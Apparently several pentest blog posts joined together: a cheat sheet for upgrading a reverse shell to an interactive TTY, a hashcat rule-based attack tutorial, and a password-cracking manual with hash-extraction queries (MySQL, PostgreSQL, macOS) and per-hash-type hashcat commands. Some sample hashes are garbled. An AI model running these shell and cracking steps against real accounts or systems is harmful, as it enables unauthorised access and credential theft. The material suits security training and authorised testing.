Shell Spawning

Python pty Module

python -c 'import pty; pty.spawn("/bin/sh")'

Perl

perl -e 'exec "/bin/sh";'

Simple Shells to Fully Interactive TTYs

1. Python to spawn a PTY

$ python -c 'import pty; pty.spawn("/bin/bash")'
        or
$ python3 -c 'import pty; pty.spawn("/bin/bash")'

2. Put the shell in to background with Ctrl-Z

$ Ctrl-Z

3. Examine the current terminal and STTY info and match it

# echo $TERM
# stty -a

The information needed is the TERM type (“xterm-256color”) and the size of the current TTY (“rows 37; columns 146”)

4. Set the current STTY to type raw and tell it to echo the input characters

 # stty raw -echo

5. Foreground the shell with fg and re-open the shell with reset

# fg
   reset

6. stty size to match our current window

$ export SHELL=bash
$ export TERM=xterm256-color
$ stty rows 37 columns 146
$ bash -i

7. Set PATH TERM and SHELL if missing

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
$ export TERM=xterm
$ export SHELL=bash
$ cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set
$ export PS1='[\u@\h \W]\$ '

The post Spawning Interactive Reverse Shell appeared first on Armour Infosec.

This post will focus on Performing Rule Based Attack Using Hashcat. It’s a way of using a dictionary or multiple dictionaries of words in order to crack a password in Kali Linux.

Rule-based Attack

Recently I was writing a blog on hashcat to cracking the hashes but the blog was going long so i thought about to write another blog to explain more about hashcat attacks,so that you can easily crack the has.So the rule-based attack is one of the most complicated of all the attack modes.The reason for this is very simple.the rule-based attack is like a programming language designed for password candidate generation. It has functions to modify,cut or extend words and has conditional operators to skip some, etc.That makes it the most flexible,accurate and efficient attack.

Why not stick to regular expressions

Why re-invent the wheel? Simple answer: regular expressions are too slow. Typically we have to generate 1.000.000.000 (or more) fresh password candidates in less than 10 ms before hashing algorithms start to become idle, and then again and again, second after second. Just take a look at your GPU speed display to get an idea of it.

Compatibility to other rule engines

The rule-engine in hashcat was written so that all functions that share the same letter-name are 100% compatible to John the Ripper and Passwordpro rules and vice versa. Later we started to introduce some of our own functions that are not compatible. But these functions got their own letter-names to avoid conflicts.

What Are Rules and When Would I Use Them?

The first thing which comes in our mind is, What are rules  why we should use rule attack to cracking the hash.So First of all, consider the following scenario. You have a basic password wordlist containing the words below:

password
mysecret
qwerty

If you wanted to try the above passwords with the pattern “123” added to the end, your list will become:

password
password123
mysecret
mysecret123
qwerty
qwerty123

If you also want to capitalise the first letter of the original words, it will now become:

password
password123
Password
mysecret
mysecret123
Mysecret
qwerty
qwerty123
Qwerty

Although you can type each new pattern manually for each word in your list,this will quickly get impractical with larger wordlists.

Thankfully,we can express these patterns in programming terms using rules. With rules,we can create new passwords through modification of existing passwords supplied.

Instead of having to write every new pattern for each password like above,we only require our original wordlist:

password
mysecret
qwerty

And a file containing the rules that express our patterns:

$c
$1 $2 $3

Though much smaller, the above would produce the same outcome of words as before. Not only is this quicker than manually creating each password you want to try, your dictionary file also won’t be as large.

In short, a rule-based attack allows you to express patterns which are applied to existing passwords to quickly generate new passwords to use.and crack the hashed fast and easily.

Creating Rules

Now that we can see the benefits of rules,we will now define some rules to use in our own rule-based attack. To define our own custom set of rules to use with hashcat, we need to store them in a file,like best64.rule or something you as want.

In this tutorial,we will cover some of the most commonly used rule functions:

Writing our rule-set:

To start, we will create some rules to do basic manipulation of the characters.

From the above table, we will put in our rules file the lowercase, uppercase and capitalize functions:

:
l
u
c

The colon entry instructs hashcat to try the original word.We’ll be including this so we can compare how many passwords were cracked using unmodified passwords from the wordlist.

We’ll also append to the end of the passwords the characters one to nine individually:

$1
$2
$3
$4
$5
$6
$7
$8
$9

To express multiple functions in a single rule, you can separate them with a space like the following:

$1 $2 $3 $4

In this case we are appending characters one, two and three to the end of our passwords.(i.e. the password is root it will convert to root1234 ), And if you want to append multi combination (i.e. $5 $ 5 it will be root55)

You can substitute one character for another, by doing the following:

sXY

Where X is the character to replace and Y is the new character.

For this demonstration,we will substitute the following letters for their commonly used alternatives:

• “@”  instead of “a”
• “3” instead of “e”
• “1” instead of “l”
• “0” instead of “o”

To express these as rules in a hashcat file, it looks like:

sa@
se3
sl1
sa@ se3 sl1
sa@ se3 ss&

The final rules we’ll add inserts the word “root” before and after the password:

^R ^o ^o ^t
^r ^o ^o ^t
$r $o $o $t

From the above, notice we’ve also included “Root” with a capital “R” before the password.

Now that we have covered the different rules we’re going to use, make sure you have created a file called “rules” that contains the following rules

:
#Lowercase
l
#Uppercase
u
#Capitalise  first character
c
#Add '1' to the end
$1
#Add '2' to the end
$2
#Add '3' to the end
$3
#Add '4' to the end
$4
#Add '5' to the end
$5
#Add '6' to the end
$6
#Add '7' to the end
$7
#Add '8' to the end
$8
#Add '9' to the end
$9
#Add '123' to the end
$1 $2 $3
#Substitute 'a' for '@'
sa@
#Substitute 'e' for '3'
se3
#substitute 'l' for '1'
sl1
#Substitute 'a' for '@', 'e' for '3', 'l' for '1'
sa@ se3 sl1
#Add the word 'root' to the beginning
^R ^o ^o ^t
#Add the word 'root' to the beginning
^r ^o ^o ^t
#Add the word 'root' to the end
$r $o $o $t

The lines beginning with a “#” are used to indicate to hashcat that the line is a comments.

Running the Rule-Based Attack

Now that we have our rules file and providing you have the Root hashes and rockyou password dictionary, we are ready to start cracking the password hashes.

In order to log the effectiveness of our rules, we’ll make use of hashcat’s debug commands. The debug option in hashcat works by logging a rule to a file every time it successfully cracks a password.

To run our rule-based attack, we will use the following command:

hashcat -a 0 -m 0 target_hash/mayhem.hash  /usr/share/wordlists/rockyou.txt -r rules --debug-mode=1 --debug-file=matched.rule --force

After following the steps above, when you run the command the output will look like..

however we do not know how many passwords each rule cracked.To find this information, this is where our debug file comes in. If we look at its contents right now…

cat matched.rule
sort matched.rule | uniq –c

Matched rules in cracking
So i got the output of hashes,hope this will help you to resolve queries of cracking the hash with hashcat.As previously mentioned, only the commonly used rule functions were covered in this tutorial. To view a full list of available rule functions, you can do so on the hashcat website here.Additionally recommend you to..

Using Existing Rule Files

It is worth mentioning that hashcat contains some rule files by default.These are located in the “rules” folder of your hashcat installation:

ls -l /usr/share/hashcat/rules/

Summary

In this guide, we created  and used our own custom rules in hashcat to perform a rule-based attack. We started by covering what rule-based attacks are and why they are used. We then proceeded to create our own rules and use the rockyou dictionary to crack MD5 hashes.

The post Performing Rule Based Attack Using Hashcat appeared first on Armour Infosec.

Hello Friends, Today I’m going to explain the Hashcat password Cracking Tool, As I learn from my cybersecurity classes and reading some blogs doing practices and the help of infosec boy’s able to explain it, so obviously the credits goes to Armour Infosec. Password cracking and user account exploitation is one of the most issues in cybersecurity field. Password Cracking tools, like Hashcat and John the Ripper, Provide the potential attackers to check billions of passwords per second against Victim’s password hashes. these tools have proved to be effective in cracking passwords, recent research shows that combining deep learning techniques with these tools can produce significantly better results. Specifically, using Generative Adversarial Networks (GANs), which comprises of two neural networks, to generate high-quality password guesses can improve the existing tools to match 51%-73% more passwords than just the tools alone. This significant improvement demonstrates that this new approach using deep learning can generate numerous new pass-words that were once beyond the reach of other tools.On one hand, this is an impressive result driven by researchers of deep learning and cybersecurity, and on the other, a strong warning to the community of the increasing dangers of weak password authentication.

This blog is a reference guide for cracking, tool usage and supportive.tools that assist pentesters in password recovery (cracking). this will not be covering the installation of these tools but will include references to their proper installation, and if all else fails, Google. Updates and additions to this blog are planned yearly as advancements in cracking evolve.

“Password recovery is a battle against math, time, cost, and human behavior, and much like any battle, the tactics are constantly  evolving.”

Table of content

1. Required Software
2. Core Hash Cracking Knowledge
3. Cracking Methodology
4. Basic Cracking
5. Dictionary / Wordlist
6. Rules & Masks
7. Common Hash Examples
8. Appendix
   1. Online Resources
   2. Hashcat Menu
   3. Hash Cracking Benchmarks
   4. Hash Cracking Speed

REQUIRED SOFTWARE

In order to follow many of the techniques in this manual, you will need to install the following software on your UNIX host. This book does not cover how to install said software and assumes you were able to follow the included links and extensive support websites.

HASHCAT v5.1.0 (or newer)
https://hashcat.net/hashcat/

JOHN THE RIPPER 1.9.0-jumbo-1 (or newer)
https://www.openwall.com/john/

Hashcat-utils v1.9 (or newer)
https://hashcat.net/wiki/doku.php?id=hashcat_utils

Additionally you will need dictionaries/wordlists and highly recommend the below sources:

WEAKPASS DICTIONARY
https://weakpass.com/wordlist

CRACKSTATION DICTIONARY
https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

SKULL SECURITY WORDLISTS
https://wiki.skullsecurity.org/index.php?title=Passwords

Throughout the manual, generic names have been given to the various inputs required in a cracking
commands structure. Legend description is below:

COMMAND STRUCTURE LEGEND
hashcat = Generic representation of the various Hashcat binary names (hashcat tool)
john = Generic representation of the John the Ripper binary names (John tool)
#type = Hash type; which is an abbreviation in John or a number in Hashcat (hash MD5,MD4..)
hash.txt = File containing target hashes to be cracked (Raw hash list )
dict.txt = File containing dictionary/wordlist (password list)
rule.txt = File containing permutation rules to alter dict.txt input
passwords.txt = File containing cracked password results
outfile.txt = File containing results of some functions output

Lastly, as a good reference for testing various hash types to place into your “hash.txt” file, the below
sites contain all the various hashing algorithms and example output tailored for each cracking tool:

HASHCAT HASH FORMAT EXAMPLES
https://hashcat.net/wiki/doku.php?id=example_hashes

JOHN THE RIPPER HASH FORMAT EXAMPLES
http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
http://openwall.info/wiki/john/sample-hashes

CORE HASH CRACKING KNOWLEDGE-:

ENCODING vs HASHING vs ENCRYPTING
Encoding = transforms data into a publicly known scheme for usability
Hashing = one-way cryptographic function nearly impossible to reverse
Encrypting = mapping of input data and output data reversible with a key

CPU vs GPU
CPU = 2–72 cores mainly optimized for sequential serial processing
GPU = 1000’s of cores with 1000’s of threads for parallel processing

CRACKING TIME = KEYSPACE / HASHRATE
Keyspace: charset^length (?a?a?a?a = 95⁴ = 81,450,625)
Hashrate: hashing function / hardware power (bcrypt / GTX1080 = 13094 H/s)
Cracking Time: 81,450,625 / 13094 H/s = 6,220 seconds
*Keyspace displayed and Hashrate vary by tool and hardware used.
SALT = random data that’s used as additional input to a one-way function
ITERATIONS = the number of times an algorithm is run over a given hash

HASH IDENTIFICATION

“there isn’t a foolproof method for identifying which hash function was used by simply looking at the hash, but there are reliable clues (i.e. $6$ sha512crypt).The best method is to know from where the hash was extracted and identify the hash function for that software”

DICTIONARY/WORDLIST ATTACK = straight attack uses a precompiled list of words, phrases,
and common/unique strings and Might be genrated according to the Information gathered to attempt to match a password.

BRUTE-FORCE ATTACK = attempts every possible combination of a given character set, usually up
to a certain length.(work like the probability mathod to make combinations)

RULE ATTACK = generates permutations against a given wordlist by modifying, trimming,
extending, expanding, combining, or skipping words.

MASK ATTACK = a form of targeted brute-force attack by using placeholders for characters in certain
positions (i.e. ?a?a?a?l?d?d).

HYBRID ATTACK = combines a Dictionary and Mask Attack by taking input from the dictionary and
adding mask placeholders (i.e. dict.txt ?d?d?d).CRACKING RIG = from a basic laptop to a 64 GPU cluster, this is the hardware/ platform
on which you perform your password hash attacks.

EXPECTED RESULTS
Know your cracking rig’s capabilities by performing benchmark testing and don’t assume you can
achieve the same results posted by forum members without using the exact same dictionary, attack plan,
or hardware setup.Cracking success largely depends on your ability to use resources efficiently and
make calculated trade-offs based on the target hash.

DICTIONARY/WORDLIST vs BRUTE-FORCE vs ANALYSIS
Dictionaries and brute-force are not the end all be all to crack hashes.They are merely the beginning and end of an attack plan.I’ll say True mastery is everything in the middle,where analysis and information gathering of passwords,patterns, behaviors, and policiesaffords the ability to recover that last 20%. Experiment with your attacks and research and compile targeted wordlists with your new knowledge.Do not rely heavily on dictionaries because they can only help you with what is “known” and not the unknown.In realworld Analysis of target and gather information to make your own dictionary/wordlist is best way to attack and get credentials of the target easier and faster.

CRACKING METHODOLOGY
Following is basic cracking methodology broken into steps,but the process is subject to change based on current/future target information uncovered during the cracking process.

1 – EXTRACT HASHES
Pull hashes from target,Victim Machine,identify hashing function, and properly format output for your tool of choice.

2 – FORMAT HASHES
Format your hashes based on your tool’s preferred method.See tool documentation for this guidance.
Hashcat,for example,on each line takes <user>:<hash> OR just the plain <hash>.

3 – EVALUATE HASH STRENGTH
Using the Appendix table “Hash Cracking Speed (Slow-Fast)” assess your target hash and it’s cracking
speed.If it’s a slow hash,you will need to be more selective at what types of dictionaries and attacks
you perform.If it’s a fast hash,you can be more liberal with your attack strategy.

4 – CALCULATE CRACKING RIG CAPABILITIES
With the information from evaluating the hash strength,baseline your cracking rig’s capabilities.
Perform benchmark testing using John The Ripper and/or Hashcat’s built-in benchmark ability on your
rig,it’s totally depends on your hardware.for example have a look..!

Hash Crackers/Bit Coin Miners

Fast Hash One
• 1.536TH/s – Cost 3-5,000 dollars.

25 GPU Hash Cracker
• An eight character NTLM password
cracked in 5.5 hours. 14 character LM
hash cracked in six minutes.350 billion
hashes per second.

To know about your System capability,use these command to get the result.

hashcat --benchmark --force
hashcat -b -m 0 --force

Based on these results you will be able to better assess your attack options by knowing your rigs capabilities against a specific hash. This will be a more accurate result of a hash’s cracking speed based on your rig.It will be useful to save these results for future reference.

5 – FORMULATE PLAN
Based on known or unknown knowledge begin creating an attack plan.Included on the next page is a
“Basic Cracking” to get you started.

6 – ANALYZE PASSWORDS
After successfully cracking a sufficient amount of hashes analyze the results for any clues or patterns.
This analysis may aid in your success on any remaining hashes.

7 – CUSTOM ATTACKS
Based on your password analysis create custom attacks leveraging those known clues or patterns.
Examples would be custom mask attacks or rules to fit target users’ behavior or preferences.just by doing some social engineering and footprinting or depends on your knowldge.

8 – ADVANCED ATTACKS
Experiment with Princeprocessor, custom Markov-chains, maskprocessor, or custom dictionary attacks
to shake out those remaining stubborn hashes. This is where your expertise and creativity really come
into play.

9 – REPEAT
Go back to STEP 4 and continue the process over again, tweaking dictionaries, mask, parameters, and
methods.gather some more information about,You’re in the grind at this point and need to rely on skill and luck.

Basic-cracking

This is only meant as a basic guide to processing hashes and each scenario will obviously be unique
based on external circumstances.For this attack plan we will assume we know the password hashes are
raw MD5 and assume we have already captured some plain text passwords of users.If we had no
knowledge of plain text passwords we would most likely skip to DICTIONARY/WORDLIST attacks.
Lastly,since MD5 is a “Fast” hash we can be more liberal with our attack plan.

1 – CUSTOM WORDLIST
First compile your known plain text passwords into a custom wordlist file.Pass this to your tool of
choice as a straight dictionary attack.

hashcat -a 0 -m 0 -w 4 hash.txt custom_list.txt
hashcat -a 0 -m 0 -w 4 hash.txt pass.txt --force

This will work only for MD5 hash where:-

-a 0 designates a dictionary attack
-m 0 designates the type of hash we are cracking (MD5)
-w 4 workload profile
-o cracked.txt is the output file for the cracked passwords.
hash.txt is our input file of hashes.
custom_list.txt is the wordlist file for this dictionary attack.

After cracking the output file will show you the passwords of cracked hashes like down below…

2 – CUSTOM WORDLIST + RULES
Run your custom wordlist with permutation rules to crack slight variations.Rules will help you to get password sooner as you have the information about victim hash.follow this link to know more about rule based attack.after all this is rockyou.txt not custom wordlist you can use according to your victim.

https://www.armourinfosec.com/performing-rule-based-attack-using-hashcat/

hashcat -a 0 -m 0 target_hash/mayhem.hash  /usr/share/wordlists/rockyou.txt -r rules --debug-mode=1 --debug-file=matched.rule --force

3 – DICTIONARY/WORDLIST
Perform a broad dictionary attack, looking for common passwords and leaked passwords in well known
dictionaries/wordlists.I’m using best64.rule of hashcat and rockyou.txt to crack.

hashcat -a 0 -m 0 target_hash/mayhem.hash /usr/share/wordlists/rockyou.txt -r best64.rule --debug-mode=1 --debug-file=matched.rule --force

4 – DICTIONARY/WORDLIST + RULES
Add rule permutations to the broad dictionary attack, looking for subtle changes to common words/phrases and leaked passwords.

hashcat -a 0 -m 0 -w 4 target_hash/mayhem.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --debug-mode=1 --debug-file=matched.rule --force

for the output open matched.rule to which rules are worked.

5 – CUSTOM WORDLIST + RULES
Add any newly discovered passwords to your custom wordlist and run an attack again with permutation
rules, looking any other variations,just by hitting the echo or awk to append the new rule.and then use the above command.
:: awk -F “:” ‘{print $2}’ hashcat.potfile >> custom_list.txt

6 – MASK
Now we will use mask attacks included with Hashcat to search the keyspace for common password
lengths and patterns, based on the RockYou dataset.there’s many pattern of passwords inside the rockyou-1-6-.hcmask like our rule based attack.go to the link to find all paths of hashcat https://centos.pkgs.org/6/forensics-i386/hashcat-3.00-1.el6.i686.rpm.html Already stored masks of hashcat.(note: attack mode will be change -a 0 to -a 3)

hashcat -a 3 -m 0 -w 4 target_hash/mayhem.hash  /usr/share/hashcat/masks/rockyou-1-60.hcmask --force

The list of all recovered passwords of given hashes.

7 – HYBRID DICTIONARY + MASK
Using a dictionary of your choice, conduct hybrid attacks looking for larger variations of common words or known passwords by appending/prepending masks to those candidates.now i think you’re able to run the commands according to needs.can’t show you all the output screen shots.there’s lots more i have to cover in this blog so lets move on to the next..

hashcat -a 7 -m 0 -w 4 hash.txt rockyou-1–60.hcmask dict.txt
hashcat -a 6 -m 0 -w 4 hash.txt dict.txt rockyou-1-60.hcmask

8 – CUSTOM WORDLIST + RULES
Add any newly discovered passwords back to your custom wordlist and run an attack again with
permutation rules looking any other subtle variations.

awk -F “:” ‘{print $2}’ hashcat.potfile >> custom_list.txt
hashcat -a 0 -m 0 -w 4 hash.txt custom_list.txt -r dive.rule --loopback

9 – COMBO
Using a dictionary of your choice, perform a combo attack by individually combining the dictionary’s
password candidates together to form new candidates.just mean combinig to dictionary’s to crack the hash.

hashcat -a 1 -m 0 -w 4 hash.txt dict.txt dict.txt

10 – CUSTOM HYBRID ATTACK
Add any newly discovered passwords back to your custom wordlist and perform a hybrid attack against
those new acquired passwords.

awk -F “:” ‘{print $2}’ hashcat.potfile >> custom_list.txt
hashcat -a 6 -m 0 -w 4 hash. txt custom_list.txt rockyou-1-60.hcmask
hashcat -a 7 -m 0 -w 4 hash. txt rockyou-1-60.hcmask custom_list.txt

11 – CUSTOM MASK ATTACK
By now the easier, weaker passwords may have fallen to cracking, but still some remain.Using PACK
create custom mask attacks based on your currently cracked passwords. Be sure to sort out

masks that match the previous rockyou-1-60.hcmask list.
hashcat -a 3 -m 0 -w 4 hash.txt custom_masks.hcmask

12 – BRUTE-FORCE
When all else fails begin a standard brute-force attack, being selective as to how large a keyspace your
rig can adequately brute-force. Above 8 characters this is typically pointless due to hardware limitations
and password entropy/ complexity.This particular mask will attempt to bruteforce an 8 character password.

Hashcat has the following charsets built-in:

?l = abcdefghijklmnopqrstuvwxyz (lowercase)
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ(uppercase)
?d = 0123456789(digits)  
?h = 0123456789abcdef(digit+lowercase)
?H = 0123456789ABCDEF(d+u)
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~  (special char)
?a = ?l?u?d?s (all alpha + lwrc + digit + special char)

hashcat -a 3 -m 0 -w 4 target_hash/mayhem.hash -i ?a?a?a?a?a?a?a?a --force

ONLINE PASSWORD ANALYSIS RESOURCES

WEAKPASS
Analyzes public password dumps and provides efficient dictionaries for download.
http://weakpass.com/
PASSWORD RESEARCH
Important password security and authentication research papers in one place.
http://www.passwordresearch.com/
THE PASSWORD PROJECT
Compiled analysis of larger password dumps using PIPAL and PASSPAL tools.
http://www.thepasswordproject.com/leaked_password_lists_and_dictionaries

DICTIONARY / WORDLIST

DOWNLOAD RESOURCES

WEAKPASS
http://weakpass.com/wordlist
CRACKSTATION DICTIONARY
https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm
HAVE I BEEN PWNED
*You’ll have to crack the SHA1’s
https://haveibeenpwned.com/passwords
SKULL SECURITY WORDLISTS
https://wiki.skullsecurity.org/index.php?title=Passwords
CAPSOP
https://wordlists.capsop.com/
UNIX-NINJA DNA DICTIONARY
*Dictionary link at bottom of article*
https://www.unix-ninja.com/p/Password_DNA
PROBABLE-WORDLIST
https://github.com/berzerk0/Probable-Wordlists
EFF-WORDLIST
Long-list (7,776 words) & Short-list (1,296 words)
https://www.eff.org/files/2016/07/18/eff_large_wordlist.txt
https://www.eff.org/files/2016/09/08/eff_short_wordlist_1.txt
RAINBOW TABLES
*Rainbow Tables are for the most part obsolete but provided here for reference*
http://project-rainbowcrack.com/table.htm

TARGETED WORDLISTS

CeWL
Custom wordlist generator scrapes & compiles keywords from websites.
https://digi.ninja/projects/cewl.php
Example scan depth of 2 and minimum word length of 5 output to wordlist.txt

cewl -d 2 -m 5 -w wordlist.txt http://<target/ website>

SMEEGESCRAPE
Text file and website scraper which generates custom wordlists from content.
http://www.smeegesec.com/2014/01/smeegescrape-text-scraper-and-custom.html
Compile unique keywords from text file and output into wordlist.

SmeegeScrape.py -f file.txt -o wordlist.txt

Scrape keywords from target website and output into wordlist.

SmeegeScrape.py -u http://<target/ website> -si -o wordlist.txt

GENERATE PASSWORD HASHES

HASHCAT
https://github.com/hashcat/hashcat/tree/master/tools

test.pl passthrough <#type> <#> dict.txt

MDXFIND
https://hashes.org/mdxfind.php

echo | mdxfind -z -h ‘<#type>’ dict.txt

LYRICPASS (Song Lyrics Password Generator)

 python3 lyricpass.py -a "eminem"

ONLINE HASH CRACKING SERVICES

GPUHASH
https://gpuhash.me/
CRACKSTATION
https://crackstation.net/
ONLINE HASH CRACK
https://www.onlinehashcrack.com/
HASH HUNTERS
http://www.hashhunters.net/

COMMON HASH EXAMPLES

MD5, NTLM, NTLMv2, LM, MD5crypt, SHA1, SHA256, bcrypt, PDF 1.4 - 1.6 (Acrobat 5-8),
Microsoft OFFICE 2013, RAR3-HP, Winzip, 7zip, Bitcoin/Litecoin, MAC OSX v10.5-v10.6,
MySQL 4.1-5+, Postgres, MSSQL(2012)-MSSQL(2014), Oracle 11g, Cisco TYPE 4 5 8 9, WPA
PSK / WPA2 PSK

MDS (HASHCAT)

HASH FORMAT
8743b52063cd84097a65dl633f5c74f5

BRUTE FORCE ATTACK

hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a

WORDLIST ATTACK

hashcat -m 0 -a 0 hash.txt dict.txt

WORDLIST + RULE ATTACK

hashcat -m 0 -a 0 hash.txt dict.txt -r rule.txt

NTLM (PWDUMP)

HASH FORMAT
b4b9b02e6f09a9bd760f388b67351e2b
BRUTE FORCE ATTACK
hashcat -m 1000 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 1000 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 1000 -a 0 hash.txt dict.txt -r rule.txt

LM

HASH FORMAT
$LM$a9c604d244c4e99d
BRUTE FORCE ATTACK
hashcat -m 3000 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 3000 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 3000 -a 0 hash.txt dict.txt -r rule.txt

MD5CRYPT

HASH FORMAT
$1$28772684$iEwNOgGugq09.bIz5sk8k/
BRUTE FORCE ATTACK
hashcat -m 500 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 500 -a 0 hash.txt dict.txtWORDLIST + RULE ATTACK
hashcat -m 500 -a 0 hash.txt dict.txt -r rule.txt

SHA1

HASH FORMAT
b89eaac7e61417341b710b727768294d0e6a277b
BRUTE FORCE ATTACK
hashcat -m 100 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 100 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 100 -a 0 hash.txt dict.txt -r rule.txt

SHA256

HASH FORMAT
127e6fbfe24a750e72930c220a8el38275656b8e5d8f48a98c3c92df2caba935
BRUTE FORCE ATTACK
hashcat -m 1400 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 1400 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 1400 -a 0 hash.txt dict.txt -r rule.txt

BCRYPT

HASH FORMAT
$2a$05$LhayLxezLhKlLhWvKxCyLOj0jlu.Kj0jZ0pEmml34uzrQlFvQDLF6

BRUTE FORCE ATTACK
hashcat -m 3200 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 3200 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 3200 -a 0 hash.txt dict.txt -r rule.txt

PDF 1.4 – 1.6 (ACROBAT 5-8)

HASH FORMAT
$pdf$2*3*128*-1028*l*16*da42eel5d4b3e08fe5b9ecea0e02ad0f*32*c9b59d72c7c670c42eeb
4fcald2cal5000000000000000000000000000000000*32*c4ff3e868dc87604626c2b8c259297al
4d58c6309c70b00afdfblfbbal0ee571
EXTRACT HASH
pdf2hashcat.py example.pdf > hash.txt
BRUTE FORCE ATTACK
hashcat -m 10500 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 10500 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 10500 -a 0 hash.txt dict.txt -r rule.txt

MICROSOFT OFFICE 2013

HASH FORMAT
example.docx:$office$*2013*100000*256*16*7dd611d7eb4c899f74816dldec817b3b*948dc0
b2c2c6c32fl4b5995a543ad037*0b7ee0e48e935f937192a59de48a7d561ef2691d5c8a3ba87ec2d
04402a94895
EXTRACT HASH
office2hashcat.py example.docx > hash.txt
BRUTE FORCE ATTACK
hashcat -m 9600 -a 3 –username hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 9600 -a 0 –username hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 9600 -a 0 –username hash.txt dict.txt -r rule.txt

RAR3-HP (ENCRYPTED HEADER)

HASH FORMAT
$RAR3$*0*45109af8ab5f297a*adbf6c5385d7a40373e8f77d7b89d317
#!Ensure to remove extraneous rar2john output to match above hash!#
EXTRACT HASH
rar2john.py example.rar > hash.txt
BRUTE FORCE ATTACK
hashcat -m 12500 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 12500 -a 0 hash.txt dict.txtWORDLIST + RULE ATTACK
hashcat -m 12500 -a 0 hash.txt dict.txt -r rule.txt

WINZIP

HASH FORMAT
$zip2$*0*3*0*b5d2b7bf57ad5e86a55c400509c672bd*d218*0**ca3d736d03a34165cfa9*$/ zip2$
#!Ensure to remove extraneous zip2john output to match above hash!#
EXTRACT HASH
zip2john.py example.zip > hash.txt
BRUTE FORCE ATTACK
hashcat -m 13600 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 13600 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 13600 -a 0 hash.txt dict.txt -r rule.txt

7-ZIP

HASH FORMAT
$7z$0$19$0$salt$8$f6196259a7326e3f0000000000000000$185065650$112$98$f3bc2a88062c
419a25acd40c0c2d75421cf23263f69c51bl3f9blaada41a8a09f9adeae45d67c60b56aad338f20c
0dcc5eb811c7a61128ee0746f922cdb9c59096869f341c7a9cblac7bb7d771f546b82cf4e6flla5e
Cd4b61751e4d8de66dd6e2dfb5b7dl022d2211e2d66eal703f96
#!Ensure to remove extraneous 7zip2john output to match above hash!#
EXTRACT HASH
7z2john.py example.7z > hash.txt
BRUTE FORCE ATTACK
hashcat -m 11600 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 11600 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 11600 -a 0 hash.txt dict.txt -r rule.txt

BITCOIN / LITECOIN

HASH FORMAT
$bitcoin$96$d011alb6a8d675b7a36d0cd2efaca32a9f8dcld57d6d01a58399ea04e703e8bbb448
99039326f7a00fl71a7bbc854a54$16$1563277210780230$158555$96$628835426818227243334
570448571536352510740823233055715845322741625407685873076027233865346542174$66$6
25882875480513751851333441623702852811440775888122046360561760525
EXTRACT HASH
bitcoin2john.py wallet.dat > hash.txt
BRUTE FORCE ATTACK
hashcat -m 11300 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 11300 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 11300 -a 0 hash.txt dict.txt -r rule.txt

MAC OS X 10.8-10.12

HASH FORMAT
username:$ml$35714$50973de90d336b5258f01e48ab324aa9ac81ca7959ac470d3d9c4395af624
398$631a0ef84081b37cfe594a5468cf3a63173cd2ec25047b89457ed300f2b41b30a0792a39912f
C5f3f7be8f74b7269ee3713172642de96ee482432a8dl2bf291a
EXTRACT HASH
sudo plist2hashcat.py /var/db/dslocal/nodes/Default/users/<username>.plist
BRUTE FORCE ATTACKhashcat -m 122 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 122 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 122 -a 0 hash.txt dict.txt -r rule.txt

MYSQL4.1 / MYSQL5+ (DOUBLE SHA1)

HASH FORMAT
FCF7C1B8749CF99D88E5F34271D636178FB5D130
EXTRACT HASH
SELECT user,password FROM mysql.user INTO OUTFILE ‘/tmp/hash.txt’;
BRUTE FORCE ATTACK
hashcat -m 300 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 300 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 300 -a 0 hash.txt dict.txt -r rule.txt

POSTGRESQL

HASH FORMAT
a6343a68d964ca596d9752250d54bb8a:postgres
EXTRACT HASH
SELECT username, passwd FROM pg_shadow;
BRUTE FORCE ATTACK
hashcat -m 12 -a 3 hash.txt ?a?a?a?a?a?a
WORDLIST ATTACK
hashcat -m 12 -a 0 hash.txt dict.txt
WORDLIST + RULE ATTACK
hashcat -m 12 -a 0 hash.txt dict.txt -r rule.txt

MSSQL(2012), MSSQL(2014)

HASH FORMAT
0x02000102030434ealbl7802fd95ea6316bd61d2c94622ca3812793e8fbl672487b5c904a45a31b
